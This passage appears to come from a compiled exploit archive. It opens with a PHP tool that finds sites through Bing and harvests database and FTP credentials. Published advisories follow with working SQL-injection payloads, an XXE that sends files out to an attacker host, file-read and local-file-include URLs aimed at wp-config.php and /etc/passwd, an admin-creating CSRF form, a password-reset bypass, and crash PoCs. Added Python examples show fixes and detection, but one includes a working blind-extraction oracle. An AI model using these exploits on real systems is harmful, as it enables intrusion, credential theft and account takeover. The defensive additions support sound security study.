        // stripos() stands in for eregi(), which PHP 7 removed
        $has_db  = stripos($file, 'DB_HOST') !== false;
        $has_ftp = stripos($file, 'FTP_USER') !== false;
        if ($has_db and !$has_ftp) {
            echo "[+] Scanning => ".$bda."\n\n";
            $db   = "[+] DB NAME : ".findit($file, "DB_NAME', '", "');")."\n\n";
            $user = "[+] DB USER : ".findit($file, "DB_USER', '", "');")."\n\n";
            $pass = "[+] DB PASS : ".findit($file, "DB_PASSWORD', '", "');")."\n\n";
            $host = "[+] DB host : ".findit($file, "DB_HOST', '", "');")."\n\n";
            echo $db, $user, $pass, $host;
            $save = fopen('exploited.txt', 'ab');
            fwrite($save, $bda."\r\n");
            fwrite($save, $db."\r\n");
            fwrite($save, $user."\r\n");
            fwrite($save, $pass."\r\n");
            fwrite($save, $host."\r\n");
            fclose($save);
        } elseif ($has_db and $has_ftp) {
            echo "FTP user : ".findit($file, "FTP_USER','", "');")."\n\n";
            echo "FTP pass : ".findit($file, "FTP_PASS','", "');")."\n\n";
            echo "FTP host : ".findit($file, "FTP_HOST','", "');")."\n\n";
        } else {
            echo $bda." : Exploit failed \n\n";
        }
    }
}

// returns the text between $starttag and the next $endtag
function findit($mytext, $starttag, $endtag) {
    $posLeft = stripos($mytext, $starttag) + strlen($starttag);
    $posRight = stripos($mytext, $endtag, $posLeft + 1);
    return substr($mytext, $posLeft, $posRight - $posLeft);
}

function site($link) {
    return parse_url($link, PHP_URL_HOST);
}

// scrapes result links from Bing, ten results per page, until there is no "next" link
function bing($what) {
    $allLinks = array();
    for ($i = 1; $i <= 2000; $i += 10) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
        curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        $data = curl_exec($ch);
        curl_close($ch);
        preg_match_all('#;a=(.*?)" h="#', $data, $links);
        foreach ($links[1] as $link) {
            $allLinks[] = $link;
        }
        if (!preg_match('#"sw_next"#', $data)) break;
    }
    return array_unique(array_map("urldecode", $allLinks));
}
?>
14. <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                         |
| Date: 05.19.2015                                                                      |
| Exploit Daddy: pancaker                                                               |
| Vendor Homepage: http://milw0rm.sourceforge.net/                                      |
| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download     |
| Version: v1.0                                                                         |
| Tested On: Ubuntu 10.04                                                               |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
| SHOUTout: milw0rm &&& your mums pancakes                                              |
| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}         |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

### vuln codez related.php ###

<?
include("include/functions.php");
$related = htmlspecialchars(trim($_GET['program']));                        <-- this isnt going to save u
$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'");   <- might as well b a straight get request lololol owned
$row = mysql_num_rows($query);
if($row){
?>
<html>
<head>
<title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title>
..zzz...

### manual ###

root@woop:~# zzz='10'
root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"

real    0m10.008s
user    0m0.004s
sys     0m0.004s

### sqlmap ###

root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba

         _
 ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf}
|_ -| . |   | | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:46:53

[09:46:53] [INFO] resuming back-end DBMS 'mysql'
[09:46:53] [INFO] testing connection to the target URL
[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: program (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
---
[09:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[09:46:53] [INFO] fetching current user
current user:    'root@localhost'
[09:46:53] [INFO] testing if current user is DBA
[09:46:53] [INFO] fetching current user
[09:46:53] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True
[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|        >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<            |
|        <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>                |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

 __ ___________ ____ ____ _____ | | __ ___________
 \____ \__ \ / \_/ ___\\__ \ | |/ // __ \_ __ \
 | |_> > __ \| | \ \___ / __ \| <\ ___/| | \/
 | __(____ /___| /\___ >____ /__|_ \\___ >__|
 |__| \/ \/ \/ \/ \/ \/

.........................cant be pr0 without ascii art
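Added example, not part of the advisory above and not the clone script's own code: a Python model of the related.php query (PHP's htmlspecialchars() emulated with its pre-8.1 ENT_COMPAT default, which leaves the single quote alone), a boolean-blind oracle driven through it with the same payload shape as the advisory's `hak5' AND (...) AND 'shit'='shit`, and the parameterized query that closes the hole. SQLite stands in for MySQL so it runs offline; the table contents and the `users` table are constructed for the demo.

```python
import html
import sqlite3


def php_htmlspecialchars(s):
    """Emulates PHP htmlspecialchars() with its pre-8.1 default flags (ENT_COMPAT):
    &, <, > and double quotes are encoded, the single quote is left alone,
    which is why the advisory says it "isnt going to save u"."""
    return html.escape(s, quote=False).replace('"', "&quot;")


def make_db():
    """Constructed stand-in for the clone script's database (SQLite, in memory)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE exploits (id INTEGER PRIMARY KEY, r TEXT, title TEXT)")
    con.executemany("INSERT INTO exploits (r, title) VALUES (?, ?)",
                    [("hak5", "sample row one"), ("milw0rm", "sample row two")])
    con.execute("CREATE TABLE users (name TEXT)")
    con.execute("INSERT INTO users VALUES ('root')")  # the value the oracle will leak
    return con


def vulnerable_rows(con, program):
    """related.php as shipped: htmlspecialchars(trim()) then string concatenation."""
    related = php_htmlspecialchars(program.strip())
    sql = "SELECT * FROM exploits WHERE r='" + related + "'"
    return len(con.execute(sql).fetchall())


def fixed_rows(con, program):
    """Same lookup with a bound parameter; the value can never alter the query."""
    return len(con.execute("SELECT * FROM exploits WHERE r=?", (program.strip(),)).fetchall())


def blind_extract(oracle, known_value, subquery, max_len=32):
    """Boolean-blind extraction through an application that only reveals whether rows
    came back.  Payload shape mirrors the advisory's `hak5' AND (...) AND 'shit'='shit`;
    swapping the condition for SLEEP() gives the time-based variant with the same logic."""
    out = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):
            cond = "unicode(substr((%s),%d,1))=%d" % (subquery, pos, code)
            if oracle("%s' AND (%s) AND 'x'='x" % (known_value, cond)) > 0:
                hit = chr(code)
                break
        if hit is None:
            break
        out += hit
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", blind_extract(lambda p: vulnerable_rows(db, p), "hak5", "SELECT name FROM users"))
    print("fixed:", repr(blind_extract(lambda p: fixed_rows(db, p), "hak5", "SELECT name FROM users")))
```

The oracle leaks `root` through the concatenated query and nothing through the bound one; against MySQL the `unicode(substr(...))` condition becomes `ORD(SUBSTRING(...))`, and wrapping it in `SLEEP()` is the time-based form the advisory demonstrates with `time curl`.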
15. #!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during its lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#

from struct import pack

def main():
    mime = "begin:vcard<x\nx;type=x;type=x,"
    mime += pack("<Q", 0x4141414141414141)  # mdm->p
    mime += pack("<Q", 0x4242424242424242)  # mdm->next
    mime += ":x>x.l:x"
    mime += pack("<H", 0x0000)  # 2 x YY_END_OF_BUFFER_CHAR

    print("Writing free.vcf to local directory...")

    try:
        with open("free.vcf", 'wb') as outfile:
            outfile.write(mime)
    except Exception as error:
        print("Error: %s\n" % error)
        return

    print("Done\n")
    return

if __name__ == "__main__":
    main()
16. # Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create a website that exploits the vulnerability.

1.1. Website that steals files using the OOB technique:

1.1.1. Website that triggers the vulnerability:

<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>

1.1.2. file.xml, served on the attacker's host. This file specifies which file should be retrieved from the remote host and where the content of that file should be sent:

<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Website that steals the hashes of the Administrator user:

1.2.1. Website that triggers the vulnerability:

<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>

1.2.2. The attacker needs to start a tool on the server that captures hashes.

2. The exploit is triggered while profiling or scanning the created application using vulnerable versions of HP WebInspect.
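Added example, not part of the advisory above and not HP's code: a pre-parse check that a scanner or gateway could apply to submitted XML before it reaches the parser. It decodes the hidden-field value exactly as a form submission would (`+` and `%25` become space and `%`), lists the external entities and parameter-entity references the payload relies on, and applies a refuse-DOCTYPE policy. The payload strings are copied from the advisory; the regexes and policy are mine.

```python
import re
import urllib.parse

# Hidden-field values copied from the advisory's two crafted pages (form-encoded: + and %25).
OOB_PAYLOAD = ('<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+'
               '"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>')
UNC_PAYLOAD = ('<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+'
               '"\\\\attacker\\path\\file.txt">%25remote;]><tag></tag>')
# Second stage (file.xml) from section 1.1.2, as served from the attacker's host.
STAGE2_DTD = ('<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">\n'
              '<!ENTITY % int "<!ENTITY &#37; trick SYSTEM \'http://attacker/?p=%payl;\'>">')

ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?P<param>%\s+)?(?P<name>\S+)\s+(?:SYSTEM|PUBLIC)\s+'
    r'(?:["\'][^"\']*["\']\s+)?(?P<q>["\'])(?P<uri>[^"\']*)(?P=q)', re.I)
DOCTYPE = re.compile(r'<!DOCTYPE\b', re.I)
PARAM_REF = re.compile(r'%[A-Za-z_][\w.-]*;')
RISKY_SCHEMES = ("http://", "https://", "ftp://", "file:", "\\\\", "//")


def decode_form_value(value):
    """The parameter as the server sees it after x-www-form-urlencoded decoding."""
    return urllib.parse.unquote_plus(value)


def external_entities(xml_text):
    """(is_parameter_entity, name, uri) for each SYSTEM/PUBLIC entity declared in the DTD."""
    return [(m.group("param") is not None, m.group("name"), m.group("uri"))
            for m in ENTITY_DECL.finditer(xml_text)]


def xxe_findings(xml_text):
    """Everything a gateway should know before handing the document to a parser."""
    ents = external_entities(xml_text)
    return {
        "has_doctype": DOCTYPE.search(xml_text) is not None,
        "external_entities": ents,
        "risky_uris": [u for _, _, u in ents if u.lower().startswith(RISKY_SCHEMES)],
        "param_refs": PARAM_REF.findall(xml_text),
    }


def is_safe_to_parse(xml_text, allow_doctype=False):
    """Policy: any external entity or parameter-entity reference is refused outright, and a
    DOCTYPE is refused unless the caller needs one.  The &#37; trick in the second stage is
    the reason: matching declarations alone can be evaded, a missing DOCTYPE cannot."""
    f = xxe_findings(xml_text)
    if f["external_entities"] or f["param_refs"]:
        return False
    return allow_doctype or not f["has_doctype"]
```

Note that `external_entities(STAGE2_DTD)` reports only the `file:///` declaration: the nested declaration hides its `%` as `&#37;` inside an internal entity, so it is the `%payl;` reference and the DOCTYPE policy, not the declaration regex, that stop the second stage.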
17. # Exploit Title: Wordpress History Collection <=1.1.1 Arbitrary File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:

The Wordpress history collection plugin contains a file called download.php which does not filter the GET input; it then uses this GET input value to force the download of a file. (download.php, line 44):

header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );

2:Proof of concept:

http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile

http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php

php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"

Greetz: Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm, MuhmadEmad, redsm0ke

By Kuroi'SH
18. # Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox) Linux (Firefox)

The affected file is f.php and the GET parameter "l" is vulnerable to local file inclusion.
We just need to base64-encode our injection, like this:

php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

or

file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

Our injection then looks like this:

http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk

and we can see the content of the passwd file.

greets to Black Sniper

Regards
T3N38R15
19. # Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux

Description:

proxy.php's code:

<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>

Based on user input, the content of a file is printed out (unfortunately not included), so any HTML file can be loaded, and an attacker may be able to read any local file that is not executed by the server.

Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

POC:
curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
20. # Exploit Title: Authentication Bypass in Pandora FMS
# Google Dork: intitle:"Pandora FMS - The Flexible Monitoring System" intitle:"Pandora FMS - el Sistema Flexible de Monitorización"
# Date: 10/06/2015
# Exploit Author: Manuel Mancera (sinkmanu) | mmancera (at) a2secure (dot) com
# Vendor Homepage: http://pandorafms.com/
# Software Link: http://pandorafms.com/
# Version: 5.0, 5.1
# Vulnerability Type : Authentication Bypass
# Severity : High

### Description ###

A vulnerability has been discovered in Pandora FMS that permits an unauthenticated user to change the password of any Pandora user without knowing the actual user password. The vulnerability occurs at the login screen, because the session is not checked before the password is changed.

### Proof of Concept ###

URL: /index.php
Method: POST
Payload: renew_password=1&login=admin
Payload2: renew_password=1&login=admin&password_new=newpass&password_confirm=newpass

### Exploit ###

curl -d "renew_password=1&login=admin&password_new=newpass&password_confirm=newpass" http://localhost/index.php

### Solution ###

Apply the latest patches available at the vendor website.

####################################################################
Disclaimer
--------------------
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information.
####################################################################
21. #!/usr/bin/python
import os
import sys
import socket
import binascii

'''
Title        : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID       : none
Product      : GeoVision
System       : GeoHttpServer
Affected     : 8.3.3.0 (may be more)
Impact       : Critical
Remote       : Yes
Website link : http://www.geovision.com.tw/
Reported     : 10/06/2015
Author       : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download files stored on the server,
such as 'boot.ini' and 'win.ini', by using a simple URL request made from a browser.
'''

#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit')
os.system('color 2')
socket.setdefaulttimeout(0.50)  # the original assigned 0.50 to the function instead of calling it
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"

def main():
    print "#######################################################################"
    print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
    print "# Usage: <ip> <port> <file>"
    print "# Example: " + sys.argv[0] + " 127.0.0.1 1337 windows\win.ini"
    print "#######################################################################"
    exit()

try:
    url = sys.argv[1]
    port = int(sys.argv[2])
    #files = open(sys.argv[3],'r').read().split()
    file = sys.argv[3]
except:
    main()

def recvall(sock):
    # read until the server closes the connection, or until the socket timeout fires
    data = ""
    part = None
    while part != "":
        try:
            part = sock.recv(4096)
        except socket.timeout:
            break
        data += part
    return data

def request(url, port, pfile):
    PATH = str(pfile)
    HOST = url
    PORT = port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((HOST, PORT))
    # traversal sequence as published: "/...\...\" followed by the requested path
    sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
    data = recvall(sock)
    temp = data.split("\r\n\r\n")   # [0] = response headers, [1] = body
    sock.shutdown(1)
    sock.close()
    return temp[1]

ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
# save the body locally, replacing path separators in the requested name
file = open(file.replace('\\', '_'), "wb")
file.write(bin)
file.close()
#~EOF
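Added example, not code from any of the four products above: the checks that download.php (History Collection), f.php (RobotCPA), proxy.php (PayPal Currency Converter) and GeoHttpServer are each missing, in one resolver, exercised with the payload shapes from those posts. The directory layout, the file names and the `uploads` base directory are constructed in a temp dir for the demo; the two base64 strings are the ones from the RobotCPA post.

```python
import base64
import os
import tempfile
from urllib.parse import urlsplit


class UnsafePath(ValueError):
    """Raised for any value that must not be turned into a file read."""


def resolve_download(base_dir, user_value):
    """Map an untrusted parameter to a regular file below base_dir, or raise UnsafePath."""
    if "\x00" in user_value:
        raise UnsafePath("NUL byte")
    # file://, php://, http:// ...: file_get_contents()/include() follow stream wrappers,
    # which is exactly how f.php and proxy.php turn a "file name" into /etc/passwd.
    if urlsplit(user_value).scheme:
        raise UnsafePath("scheme-prefixed value refused")
    # Windows servers (GeoHttpServer, PHP on Windows) treat '\' as a separator; normalise
    # before any other check so '..\..' is seen as traversal, not as an odd file name.
    normalized = user_value.replace("\\", "/")
    if normalized.startswith("/"):
        raise UnsafePath("absolute path refused")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, normalized))
    # realpath collapses '..' and symlinks; the result must still sit inside base.
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("escapes base directory")
    if not os.path.isfile(target):
        raise UnsafePath("not a regular file")
    return target


def decode_robotcpa_param(l):
    """f.php base64-decodes ?l= before using it; decode the same way so the check sees
    the real value rather than the encoded one."""
    return base64.b64decode(l).decode("utf-8", "replace")


def demo():
    """Run the resolver over the payloads from the posts plus a legitimate name.
    Returns {label: 'ok:<path>' or 'refused:<reason>'}; the layout is constructed."""
    root = tempfile.mkdtemp()
    site = os.path.join(root, "site")
    uploads = os.path.join(site, "uploads")
    os.makedirs(uploads)
    with open(os.path.join(site, "wp-config.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for the real config */\n")
    with open(os.path.join(uploads, "report.txt"), "w") as fh:
        fh.write("constructed sample download\n")

    samples = {
        "legit": "report.txt",
        "history-collection": "../../../wp-config.php",
        "history-collection-short": "../wp-config.php",
        "robotcpa-filter": decode_robotcpa_param("cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA=="),
        "robotcpa-file": decode_robotcpa_param("ZmlsZTovLy9ldGMvcGFzc3dk"),
        "paypal-proxy": "/etc/passwd",
        "geovision": "...\\...\\windows\\win.ini",
    }
    results = {}
    for label, value in samples.items():
        try:
            results[label] = "ok:" + resolve_download(uploads, value)
        except UnsafePath as exc:
            results[label] = "refused:" + str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print("%-26s %s" % (label, outcome))
```

On a POSIX host the GeoVision `...\...\` form is refused only because no such file exists under the base; the backslash normalisation is what matters on the Windows servers it targets, where the containment check sees the traversal directly.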
22. # Exploit Title: FiverrScript CSRF Vulnerability (add New admin)
# Author: Mahmoud Gamal (@Zombiehelp54)
# Google Dork: intext:Powered by FiverrScript
# Date: 10/06/2015
# Exploit Author: Scriptolution
# Vendor Homepage: http://scriptolution.com
# Software Link: http://fiverrscript.com
# Version: 7.2
# Tested on: Windows

FiverrScript is vulnerable to a CSRF attack (no CSRF token in place), meaning that if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), a form will be submitted to (http://localhost/fiverrscript/administrator/admins_create.php) that will add a new user as administrator. Once exploited, the attacker can log in to the admin panel (http://localhost/fiverrscript/administrator/index.php) using the username and the password he posted in the form.

CSRF PoC Code
=============

<form action="http://localhost/fiverrscript/administrator/admins_create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">
<input type="hidden" id="submitform" name="submitform" value="1">
<input type="hidden" name="username" value="attackerUsername">
<input type="hidden" name="password" value="attackerPreferedPW" >
<input type="hidden" name="email" value="attackeremail@something.com">
</form>
<script>
document.forms[0].submit();
</script>

Reported to script owner.

Security Level:
================
High
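Added example, not the vendors' code, covering both the Pandora FMS post (password renewal with no session check) and the FiverrScript post (admin creation with no CSRF token): a small request-handler model with the two missing controls, a session check before any state change and a session-bound HMAC CSRF token. The user store, session store, server key and field names are constructed for the demo; the form field names match the two posts so their PoC requests can be replayed against it.

```python
import hashlib
import hmac
import secrets

# Constructed stores and key; a real deployment keeps these server-side, per deployment.
SECRET = secrets.token_bytes(32)
SESSIONS = {}                                   # session id -> {"user", "role"}
USERS = {"admin": {"password": "old-admin-pw", "role": "admin"}}


def login(user, password):
    """Issue a session only after a credential check; returns the session id or None."""
    record = USERS.get(user)
    if record is None or not hmac.compare_digest(record["password"], password):
        return None
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "role": record["role"]}
    return sid


def csrf_token(session_id):
    """Token = HMAC(server key, session id).  A page on another origin can auto-submit a
    form with the victim's cookie attached, but it cannot read the session id or the key,
    so it cannot produce this value."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_id, token):
    return bool(token) and hmac.compare_digest(csrf_token(session_id), token)


def renew_password(form, session_id):
    """Pandora FMS 5.x accepted renew_password=1&login=<user>&password_new=...&password_confirm=...
    from the login screen with no session.  Here the session is checked first, the CSRF
    token second, and a non-admin may only change their own password."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        return 401, "authentication required"
    if not csrf_valid(session_id, form.get("csrf_token")):
        return 403, "bad csrf token"
    target = form.get("login", "")
    if target not in USERS:
        return 404, "no such user"
    if target != sess["user"] and sess["role"] != "admin":
        return 403, "may only change own password"
    new = form.get("password_new")
    if not new or new != form.get("password_confirm"):
        return 400, "password confirmation mismatch"
    USERS[target]["password"] = new
    return 200, "password changed"


def admins_create(form, session_id):
    """FiverrScript's admins_create.php ran on any POST carrying a logged-in admin's cookie.
    With the token required, the auto-submitting form in the post fails with 403."""
    sess = SESSIONS.get(session_id)
    if sess is None or sess["role"] != "admin":
        return 403, "admin session required"
    if not csrf_valid(session_id, form.get("csrf_token")):
        return 403, "bad csrf token"
    USERS[form["username"]] = {"password": form["password"], "role": "admin"}
    return 200, "admin created"
```

The token is only useful if the legitimate form embeds it and the cookie carries the session; with `SameSite=Lax` on the session cookie as well, the cross-site POST in the FiverrScript PoC arrives without a session at all and fails at the first check.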
23. '''
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
# Version: 3.11.0.2
# Author: 3unnym00n
# Details:
# --------
# the sftp module for filezilla is based on putty's psftp component.
# when doing the ssh dh group exchange old style, if the server sends a malformed dh group exchange reply, it can crash the filezilla component
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
'''

import socket
import struct

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()

## do banner exchange
## send server banner
client.send('SSH-2.0-SUCK\r\n')

## recv client banner
client_banner = ''
while True:
    data = client.recv(1)
    if data == '\x0a':
        break
    client_banner += data
print 'the client banner is: %s' % client_banner.__repr__()

## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)

## send server algorithms
client.send('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'.decode('hex'))

## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)

## send dh group exchange group
client.send('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'.decode('hex'))

## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)

## send dh group exchange reply
dh_gex_reply_msg  = '\x00\x00\x02\x3c'    ## pl
dh_gex_reply_msg += '\x09'                ## padding len
dh_gex_reply_msg += '\x21'                ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff'    ## dh host key len
dh_gex_reply_msg += 'A'*600

client.sendall(dh_gex_reply_msg)
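Added example, not part of the post above and not PuTTY's or FileZilla's code: a bounds-checked parser for the SSH binary packet framing and the SSH_MSG_KEX_DH_GEX_REPLY message, fed the exact bytes the PoC server sends. The packet declares a 65535-byte host key inside a 572-byte packet; a reader that validates every length against the bytes actually received rejects it with a controlled error instead of reading past the buffer. The well-formed reply used for the round trip (host key, f and signature contents) is constructed and carries no real key material.

```python
import struct

SSH_MSG_KEX_DH_GEX_REPLY = 33
MAX_PACKET = 35000          # RFC 4253 s6.1: implementations must accept at least this
MAX_STRING = 256 * 1024     # hard cap for any single string/mpint, well above real host keys


class MalformedPacket(ValueError):
    pass


class Reader:
    """Bounds-checked cursor over a buffer; every read is validated before it happens."""
    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def remaining(self):
        return len(self.buf) - self.pos

    def take(self, n):
        if n > self.remaining():
            raise MalformedPacket("need %d bytes, %d available" % (n, self.remaining()))
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def uint32(self):
        return struct.unpack(">I", self.take(4))[0]

    def byte(self):
        return self.take(1)[0]

    def string(self):
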